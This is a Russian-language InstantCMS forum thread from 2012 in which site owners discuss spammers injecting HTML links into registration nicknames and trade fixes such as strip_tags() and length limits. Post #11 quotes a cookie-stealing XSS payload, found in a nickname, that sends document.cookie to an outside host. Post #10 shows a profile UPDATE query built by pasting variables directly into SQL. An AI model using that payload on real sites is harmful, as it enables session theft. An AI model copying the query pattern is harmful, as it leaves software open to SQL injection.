Найти на сайте
  2. Форумы
  3. ОБСУЖДЕНИЯ
  4. Сайт и форум проекта
  5. новые трюки спаммеров, как вылечить ?

новые трюки спаммеров, как вылечить ?

#1 17 мая 2012 в 15:05
новые трюки спаммеров, как вылечить ?
при регистрации в Никнейм:
прописывают < a href="http:// муравсякая. ru/ " >спам< /a >
и ссылка работает.

как запретить прописать в Никнейм <a href="http://
0
#2 17 мая 2012 в 15:17
Я поступил очень просто, в инпуте ввода имени указал максимальное число символов — 15. Для любых Вась и Петь более чем достаточно.
Skype: pasha--g
0
#3 17 мая 2012 в 15:22
ха — такой же сегодня зарегался — пока просто удалил у него ссылку с ника и всё — дальше посмотрим
иногда пишу полезные вещи, мои контакты в профиле
0
#4 17 мая 2012 в 15:25
какие молодцы однако спамеры (:
0
#5 17 мая 2012 в 15:26
Sergey Platonov, так может лучше сразу при изменении никнейма и при регистрации поставить strip_tags() glassesВсех не усмотришь…
оптимизирую помаленьку
0
#6 17 мая 2012 в 15:34
lezginka.ru, Воспользуйтесь preg_match на ник пользователя при регистрации и редактировании профиля.
0
#7 17 мая 2012 в 15:40


Sergey Platonov, так может лучше сразу при изменении никнейма и при регистрации поставить strip_tags() glassesВсех не усмотришь..

SJen

ну пока затихло, если будут долбиться, то придётся срочно бросать учёбу, искать время и прописывать функцию проверки ника при регистрации ещё и на это. а пока в долгий ящик откладывать придётся, если ктонить не сделает
иногда пишу полезные вещи, мои контакты в профиле
0
#8 17 мая 2012 в 15:55
WALTERZ, а нельзя на пальцах объяснить, т.е. где и что менять?
0
#9 17 мая 2012 в 15:59
Странно, попробовал произвести регистрацию на 1.9 чистом — ссылка не работает.
Но если что, действительно проще будет:
  1. $nickname=strip_tags($nickname);
0
#10 17 мая 2012 в 16:03
lezginka.ru, вставьте этот код в frontend.php компонента регистрации
после:
  1. $group_id = $cfg['default_gid'] ? $cfg['default_gid'] : 1;
И в фронтенд компонента users, чтобы не хитрили также с настройками профилей… вставить ДО запроса в EDIT PROFILE:
  1. 			$sql = "UPDATE cms_user_profiles 
  2. 					SET city = '$city',
  3. 						description = '$description',
  4. 						showmail='$showmail',
  5. 						showbirth='$showbirth',
  6. 						showicq='$showicq',
  7. 						allow_who='$allow_who',
  8. 						signature='$signature',
  9. 						gender='$gender' $forms_sql,
  10. 						email_newmsg='$email_newmsg',
  11. 						cm_subscribe='$cm_subscribe'
  12. 					WHERE user_id = '$id'";
  13. 			$inDB->query($sql) ;
0
#11 15 августа 2012 в 23:39
вижу в нике

  1. <script>img = new Image();img.src="http://antiha.h19.ru/s.gif?"+document.cookie;</script>;
логин

scriptimgnewimageimgsrchttpantihah19rusgifdocumentcookiescript


чтобы это значило?
0
#12 16 августа 2012 в 01:33
всем рекомендую ставить apache2-mpm-itk и это очень сильно повысит безопасность так как там скрипты работают с правами пользователя а не сервера
Раньше РАЙ был везде - РАЙсовет, РАЙком, РАЙсобес...., а сейчас везде АДминистрации! Не надо давать людям советы. Каждый должен лохануться самостоятельно! Любишь в продакшн, люби и баги починить!
0
#13 17 августа 2012 в 04:21
Уважаемый WALTERZ не могли бы вы подсказать способ как запретить регистрировать новый аккаунт тому кто уже в бане. проверкой по ip (забаненных) конечно есть подтверждение аккаунта но, что стоит активировать его левой почтой или многочисленными проверками + инвайтый сильно замедляют развитие сайта
заранее спасибо за помощь.
PS думаю всем пригодится забанел 1 ip и все с него уже нету нарушений, конечно это не всем пойдет, но все же для меня лично было бы супер другие могу подумать с подсетями когда полностью какую то маску забанеть от греха.
0
#14 17 августа 2012 в 11:09

Уважаемый WALTERZ не могли бы вы подсказать способ как запретить регистрировать новый аккаунт тому кто уже в бане. проверкой по ip (забаненных) конечно есть подтверждение аккаунта но, что стоит активировать его левой почтой или многочисленными проверками + инвайтый сильно замедляют развитие сайта

Александр
С левыми телефоннными номерами сложней)))) их меньше)
0
#15 17 августа 2012 в 14:33
WALTERZ, спасибо огромное обновлюсь вашим способом! :)
eoleg, что это такое и как ставить))))
Люблю эту CMS! Я немного художествую тут: http://virelart.ru :) Пока по большей части выкладываюсь тут vk.com/virelart. p.s.: пасибки можно в карму :3
0
Видео с ВК
настройка вывода url
Вы не можете отвечать в этой теме.
Войдите или зарегистрируйтесь, чтобы писать на форуме.

Похожие темы

Новые правила с 2020г

Инновации в системе Создана 4 года назад 23 сообщения

Не удается обновится

Релизы 2.X Создана 4 года назад 24 сообщения

[ЕСТЬ РЕШЕНИЕ] Комментарии

Релизы 2.X Создана 4 года назад 3 сообщения

В 14.1 не отображаются новые сообщения

Компоненты Создана 3 года назад 9 сообщений

Новые ключи Яндекс перевод для комп.Языки

Компоненты Создана 3 года назад 7 сообщений

[ЕСТЬ РЕШЕНИЕ] PHP8. Ошибка в "Виджеты и страницы"

Релизы 2.X Создана 3 года назад 7 сообщений

InstantCMS Team

Связь с нами
Email dev@instantcms.ru

Делаем полезные Интернет проекты с 2008 года 💫

О проекте

Поддержка

Дополнения

Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.